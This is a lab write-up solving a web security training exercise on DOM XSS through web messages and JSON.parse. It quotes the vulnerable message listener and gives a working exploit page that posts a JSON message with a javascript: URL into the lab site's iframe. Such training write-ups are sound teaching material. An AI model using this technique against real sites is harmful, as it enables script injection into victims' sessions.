DOM XSS using web messages and JSON.parse

Description

This lab uses web messaging and parses the message as JSON. To solve the lab, construct an HTML page on the exploit server that exploits this vulnerability and calls the print() function.

Approach

After accessing the lab, I inspected the web page code by pressing CTRL + U and discovered an interesting script block:

<script>
window.addEventListener('message', function(e) {
    var iframe = document.createElement('iframe'), ACMEplayer = {element: iframe}, d;
    document.body.appendChild(iframe);
    try {
        d = JSON.parse(e.data);
    } catch(e) {
        return;
    }
    switch(d.type) {
        case "page-load":
            ACMEplayer.element.scrollIntoView();
            break;
        case "load-channel":
            ACMEplayer.element.src = d.url;
            break;
        case "player-height-changed":
            ACMEplayer.element.style.width = d.width + "px";
            ACMEplayer.element.style.height = d.height + "px";
            break;
    }
}, false);
</script>

This script listens for web messages, parses them as JSON, and performs actions based on the type value in the JSON. The most interesting case is load-channel because if my web message specifies the type as load-channel, it will assign the url value from the JSON to the src attribute of the iframe created at the start of the script.

To exploit this, I need to craft a JSON message with a type of load-channel and a url containing an XSS payload. The JSON should look like this:

{"type":"load-channel","url":"javascript:print()"}

Next, I need to build an exploit HTML page that contains an iframe with the vulnerable website. The iframe will have an event handler that sends the crafted JSON message to the home page. My exploit page will look like this:

<iframe src=https://0ac000cc04ba25458239b1ca00e6003d.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'>

In this code:

• The iframe loads the vulnerable website.

• The onload event handler sends a web message containing the JSON with my XSS payload.

The " characters in the JSON string are escaped with backslashes \ to ensure the JSON is correctly formatted.

By embedding this HTML code in the body of the exploit server and clicking "Deliver exploit to victim," the lab is solved.